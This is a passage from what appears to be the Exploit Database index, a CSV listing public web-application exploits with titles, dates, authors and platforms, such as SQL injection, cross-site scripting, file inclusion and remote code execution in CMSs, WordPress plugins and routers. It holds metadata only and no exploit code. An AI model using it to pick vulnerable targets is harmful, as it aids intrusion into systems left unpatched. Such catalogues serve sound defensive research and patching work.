Script Silver Edition - 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,webapps,php, +36040,exploits/php/webapps/36040.txt,"Chamilo LMS 1.9.8 - Blind SQL Injection",2015-02-09,"Kacper Szurek",webapps,php,80 +36000,exploits/php/webapps/36000.txt,"HP Network Automation 9.10 - SQL Injection",2011-07-28,anonymous,webapps,php, +36001,exploits/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Open Redirection",2011-07-28,"Tom Neaves",webapps,asp, +36002,exploits/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",webapps,jsp, +36003,exploits/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",webapps,php, +36005,exploits/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' SQL Injection",2011-08-02,"AutoRUN & dR.sqL",webapps,php, +36008,exploits/php/webapps/36008.txt,"Gilnet News - 'read_more.php' SQL Injection",2011-07-11,Err0R,webapps,php, +36009,exploits/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Cross-Site Scripting",2011-08-03,Err0R,webapps,php, +36010,exploits/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,webapps,asp, +36011,exploits/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' SQL Injection",2011-08-03,Err0R,webapps,asp, +36012,exploits/php/webapps/36012.txt,"Joomla! Component com_xeslidegalfx - 'id' SQL Injection",2011-08-03,"Ne0 H4ck3R",webapps,php, +36015,exploits/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' SQL Injection",2011-08-03,"Ne0 H4ck3R",webapps,php, +36017,exploits/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",webapps,php, +36018,exploits/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",webapps,php, +36019,exploits/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,webapps,asp, +36041,exploits/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",webapps,php,80 +36023,exploits/php/webapps/36023.txt,"RedaxScript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",webapps,php, +36059,exploits/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",webapps,php,80 +36026,exploits/php/webapps/36026.txt,"u5CMS 3.9.3 - 'deletefile.php' Arbitrary File Deletion",2015-02-09,LiquidWorm,webapps,php, +36027,exploits/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injections",2015-02-09,LiquidWorm,webapps,php, +36028,exploits/php/webapps/36028.txt,"u5CMS 3.9.3 - 'thumb.php' Local File Inclusion",2015-02-09,LiquidWorm,webapps,php, +36029,exploits/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,webapps,php, +36031,exploits/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",webapps,php, +36058,exploits/php/webapps/36058.txt,"WordPress Plugin Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",webapps,php, +36032,exploits/php/webapps/36032.txt,"Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,webapps,php, +36033,exploits/php/webapps/36033.txt,"Search Network 2.0 - 'query' Cross-Site Scripting",2011-08-08,darkTR,webapps,php, +36034,exploits/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",webapps,php, +36035,exploits/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' SQL Injection",2011-08-08,darkTR,webapps,php, +36036,exploits/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' SQL Injection",2011-08-08,darkTR,webapps,php, +36038,exploits/php/webapps/36038.txt,"WordPress Plugin eShop 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",webapps,php, +39386,exploits/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",webapps,php,80 +36042,exploits/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",webapps,hardware, +36043,exploits/php/webapps/36043.rb,"WordPress Plugin WP EasyCart - Unrestricted Arbitrary File Upload (Metasploit)",2015-02-10,Metasploit,webapps,php,80 +36044,exploits/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",webapps,php, +36046,exploits/php/webapps/36046.txt,"phpWebSite - 'page_id' Cross-Site Scripting",2011-08-17,Ehsan_Hp200,webapps,php, +36047,exploits/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusions",2011-08-15,muuratsalo,webapps,php, +36048,exploits/php/webapps/36048.txt,"phpList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",webapps,php, +36050,exploits/php/webapps/36050.txt,"WordPress Plugin Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",webapps,php, +36051,exploits/php/webapps/36051.txt,"WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",webapps,php, +36054,exploits/php/webapps/36054.txt,"WordPress Plugin Survey and Poll 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",webapps,php,80 +36055,exploits/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,webapps,php,8080 +36057,exploits/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",webapps,cgi,52311 +36061,exploits/php/webapps/36061.php,"WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",webapps,php, +36063,exploits/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injections",2011-08-17,"L0rd CrusAd3r",webapps,asp, +36064,exploits/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu - 'category.asp' SQL Injection",2011-08-17,Inj3ct0r,webapps,asp, +36065,exploits/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu - 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,webapps,asp, +36066,exploits/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injections",2011-08-17,"L0rd CrusAd3r",webapps,asp, +36067,exploits/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting",2011-08-18,G.R0b1n,webapps,cfm, +36068,exploits/php/webapps/36068.txt,"MantisBT 1.1.8 - Cross-Site Scripting / SQL Injection",2011-08-18,Net.Edit0r,webapps,php, +36072,exploits/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,webapps,php, +36073,exploits/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross-Site Scripting",2011-08-22,"mehdi boukazoula",webapps,php, +36074,exploits/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",webapps,php, +36076,exploits/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Cross-Site Scripting",2011-08-22,"Aung Khant",webapps,php, +36077,exploits/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",webapps,php, +36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php, +36080,exploits/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php, +36081,exploits/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",webapps,php, +36082,exploits/php/webapps/36082.pl,"Zazavi 1.2.1 - '/FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,webapps,php, +36083,exploits/php/webapps/36083.txt,"Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",webapps,php, +36084,exploits/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,webapps,php, +36085,exploits/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,webapps,php, +36086,exploits/php/webapps/36086.txt,"WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",webapps,php, +36087,exploits/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,webapps,php, +36089,exploits/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",webapps,php,80 +36090,exploits/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,webapps,php, +36091,exploits/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",webapps,php, +36093,exploits/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,webapps,php, +36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,webapps,php, +36095,exploits/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,webapps,php, +36096,exploits/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,webapps,php, +36097,exploits/php/webapps/36097.txt,"Mambo Component N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,webapps,php, +36098,exploits/php/webapps/36098.html,"Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",webapps,php,80 +36099,exploits/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",webapps,php,80 +36102,exploits/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,webapps,php, +36103,exploits/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,webapps,php, +36105,exploits/hardware/webapps/36105.sh,"D-Link DSL-2640B ADSL Router - 'ddnsmngr' Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",webapps,hardware, +36106,exploits/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,webapps,php, +36107,exploits/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,webapps,php, +36108,exploits/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,webapps,php, +36109,exploits/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,webapps,php, +36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php, +36112,exploits/php/webapps/36112.txt,"WordPress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",webapps,php,80 +36113,exploits/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,webapps,php, +36114,exploits/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injections",2011-09-05,"Eyup CELIK",webapps,php, +36116,exploits/asp/webapps/36116.txt,"Kisanji - 'gr' Cross-Site Scripting",2011-09-06,Bl4ck.Viper,webapps,asp, +36117,exploits/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injections",2011-09-06,"Yassin Aboukir",webapps,php, +36121,exploits/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",webapps,php, +36122,exploits/php/webapps/36122.txt,"SkaDate - 'blogs.php' Cross-Site Scripting",2011-09-08,sonyy,webapps,php, +36123,exploits/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' SQL Injection",2011-09-08,SubhashDasyam,webapps,php, +36126,exploits/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",webapps,multiple,8080 +36127,exploits/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",webapps,php,80 +36129,exploits/php/webapps/36129.txt,"Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,webapps,php, +36131,exploits/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",webapps,php, +36132,exploits/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",webapps,xml, +36133,exploits/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",webapps,asp, +36134,exploits/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Multiple Open Redirections",2011-09-14,"Irene Abezgauz",webapps,asp, +36135,exploits/php/webapps/36135.txt,"WordPress Plugin Auctions 1.8.8 - 'wpa_id' SQL Injection",2011-09-14,sherl0ck_,webapps,php, +36136,exploits/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,webapps,php, +36137,exploits/php/webapps/36137.txt,"PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",webapps,php, +36138,exploits/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' SQL Injection",2011-09-18,m3rciL3Ss,webapps,asp, +36139,exploits/asp/webapps/36139.txt,"Ay Computer (Multiple Products) - Multiple SQL Injections",2011-09-17,m3rciL3Ss,webapps,asp, +36140,exploits/php/webapps/36140.txt,"Toko Lite CMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",webapps,php, +36141,exploits/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Cross-Site Scripting",2011-09-19,"kurdish hackers team",webapps,asp, +36142,exploits/php/webapps/36142.txt,"net4visions (Multiple Products) - 'dir' Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",webapps,php, +36144,exploits/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,webapps,php, +36146,exploits/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Cross-Site Scripting",2011-09-21,Kurd-Team,webapps,asp, +36147,exploits/php/webapps/36147.txt,"Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",webapps,php, +36148,exploits/php/webapps/36148.txt,"phpRS 2.8.1 - Multiple SQL Injections / Cross-Site Scripting",2011-09-18,iM4n,webapps,php, +36149,exploits/php/webapps/36149.txt,"OneCMS 2.6.4 - Multiple SQL Injections",2011-09-21,"kurdish hackers team",webapps,php, +36150,exploits/php/webapps/36150.txt,"Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",webapps,php, +36151,exploits/php/webapps/36151.txt,"Zyncro 3.0.1.20 - Social Network Message Menu SQL Injection",2011-09-22,"Ferran Pichel Llaquet",webapps,php, +36154,exploits/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Persistent Cross-Site Scripting",2015-02-23,"Halil Dalabasmaz",webapps,php, +36155,exploits/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",webapps,php,80 +36156,exploits/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",webapps,php,80 +36157,exploits/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",webapps,php,80 +36159,exploits/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",webapps,php,80 +36160,exploits/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",webapps,php,80 +36161,exploits/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",webapps,php,80 +36162,exploits/php/webapps/36162.txt,"TWiki 5.0.2 - '/bin/view/Main/Jump?newtopic' Cross-Site Scripting",2011-09-22,"Mesut Timur",webapps,php, +36163,exploits/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin - Slide Show Pages URI Cross-Site Scripting",2011-09-22,"Mesut Timur",webapps,php, +36164,exploits/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,webapps,php, +36165,exploits/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",webapps,php, +36166,exploits/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,webapps,php, +36167,exploits/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",webapps,php, +36168,exploits/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",webapps,php, +36171,exploits/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' SQL Injection",2011-09-26,"BHG Security Group",webapps,php, +36172,exploits/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,webapps,cfm, +36173,exploits/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' SQL Injection",2011-09-27,"kurdish hackers team",webapps,php, +36175,exploits/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",webapps,php, +36176,exploits/php/webapps/36176.txt,"Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",webapps,php, +36177,exploits/php/webapps/36177.txt,"Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",webapps,php, +36178,exploits/php/webapps/36178.txt,"WordPress Theme Atahualpa 3.6.7 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,webapps,php, +36179,exploits/php/webapps/36179.txt,"WordPress Theme Hybrid 0.9 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php, +36180,exploits/php/webapps/36180.txt,"WordPress Theme F8 Lite 4.2.1 - 's' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php, +36181,exploits/php/webapps/36181.txt,"WordPress Theme Elegant Grunge 1.0.3 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,webapps,php, +36182,exploits/php/webapps/36182.txt,"WordPress Theme EvoLve 1.2.5 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,webapps,php, +36183,exploits/php/webapps/36183.txt,"WordPress Theme Cover WP 1.6.5 - 's' Cross-Site Scripting",2011-09-24,jabdah,webapps,php, +36184,exploits/php/webapps/36184.txt,"WordPress Theme Web Minimalist 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php, +36185,exploits/php/webapps/36185.txt,"WordPress Theme Pixiv Custom Theme 2.1.5 - 'cpage' Cross-Site Scripting",2011-09-29,SiteWatch,webapps,php, +36186,exploits/php/webapps/36186.txt,"WordPress Theme Morning Coffee 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,webapps,php, +36187,exploits/php/webapps/36187.txt,"WordPress Theme Black-LetterHead 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,webapps,php, +36191,exploits/php/webapps/36191.txt,"WordPress Theme RedLine 1.65 - 's' Cross-Site Scripting",2011-09-30,SiteWatch,webapps,php, +36192,exploits/php/webapps/36192.txt,"A2CMS - 'index.php' Local File Disclosure",2011-09-28,St493r,webapps,php, +36193,exploits/php/webapps/36193.txt,"WordPress Plugin WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",webapps,php, +36194,exploits/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",webapps,php, +36195,exploits/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php, +36196,exploits/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,webapps,php, +36197,exploits/php/webapps/36197.txt,"ezCourses - 'admin.asp' Security Bypass",2011-10-01,J.O,webapps,php, +36200,exploits/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",webapps,php, +36201,exploits/php/webapps/36201.txt,"Phorum 5.2.18 - '/admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",webapps,php, +36202,exploits/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",webapps,hardware,80 +36203,exploits/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2011-10-04,"Aung Khant",webapps,php, +36204,exploits/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",webapps,php, +36208,exploits/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' SQL Injection",2011-10-15,"Aung Khant",webapps,php, +36262,exploits/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",webapps,windows, +36244,exploits/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",webapps,php, +36245,exploits/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Cross-Site Scripting",2011-10-20,"Eyup CELIK",webapps,php, +36213,exploits/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Cross-Site Scripting",2011-10-06,"Stefan Schurtz",webapps,php, +36214,exploits/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,webapps,php, +36215,exploits/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' SQL Injection",2011-10-09,"BHG Security Center",webapps,php, +36216,exploits/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusions",2011-10-10,indoushka,webapps,php, +36220,exploits/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' SQL Injection",2011-10-11,CoBRa_21,webapps,php, +36221,exploits/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' SQL Injection",2011-10-11,CoBRa_21,webapps,php, +36222,exploits/php/webapps/36222.txt,"Joomla! Component com_shop - 'id' SQL Injection",2011-10-11,CoBRa_21,webapps,php, +36223,exploits/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusions",2011-10-11,indoushka,webapps,php, +36224,exploits/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",webapps,php, +36225,exploits/php/webapps/36225.txt,"ContaoCMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",webapps,php, +36226,exploits/php/webapps/36226.txt,"Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",webapps,php, +36227,exploits/php/webapps/36227.txt,"Joomla! Component com_sgicatalog 1.0 - 'id' SQL Injection",2011-10-12,"BHG Security Center",webapps,php, +36228,exploits/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",webapps,php, +36230,exploits/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",webapps,php, +36231,exploits/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,webapps,php, +36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80 +36233,exploits/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",webapps,php, +36236,exploits/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,webapps,php, +36237,exploits/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,webapps,php, +36240,exploits/php/webapps/36240.txt,"Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",webapps,php, +36241,exploits/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",webapps,hardware, +36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php, +36243,exploits/php/webapps/36243.txt,"WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",webapps,php, +36248,exploits/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,webapps,php, +36249,exploits/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",webapps,php, +36251,exploits/php/webapps/36251.txt,"PHPMoAdmin - Unauthorized Remote Code Execution",2015-03-03,@u0x,webapps,php,80 +36252,exploits/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Remote Command Execution",2011-10-24,"Matt Bergin",webapps,php, +36253,exploits/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",webapps,php, +36254,exploits/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusions",2011-10-25,"Null H4ck3r",webapps,php, +36255,exploits/php/webapps/36255.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2011-10-26,LiquidWorm,webapps,php, +36259,exploits/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections",2011-10-28,"Vulnerability Research Laboratory",webapps,php, +36265,exploits/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",webapps,php,80 +36269,exploits/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",webapps,php, +36270,exploits/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",webapps,php, +36272,exploits/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,webapps,php, +36273,exploits/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusions",2011-11-01,indoushka,webapps,php, +36275,exploits/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",webapps,jsp, +36277,exploits/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Cross-Site Scripting",2011-11-01,Isfahan,webapps,php, +36278,exploits/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",webapps,php, +36282,exploits/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections",2011-11-02,"High-Tech Bridge SA",webapps,php, 